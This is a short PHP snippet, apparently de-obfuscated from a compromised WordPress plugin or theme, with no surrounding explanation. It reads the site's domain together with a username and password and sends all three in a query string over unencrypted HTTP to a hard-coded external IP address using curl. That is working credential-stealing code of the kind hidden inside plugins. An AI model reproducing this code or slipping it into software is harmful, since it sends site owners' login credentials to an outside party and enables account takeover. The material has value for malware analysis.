/* Decoded by unphp.net */ $urlparts = parse_url(home_url()); $domain = $urlparts['host']; $credentials = array('domain' => $domain, 'username' => $username, 'password' => $password); $check = "http://142.93.105.127/contentstudio/" . '?' . http_build_query($credentials); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $check); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch);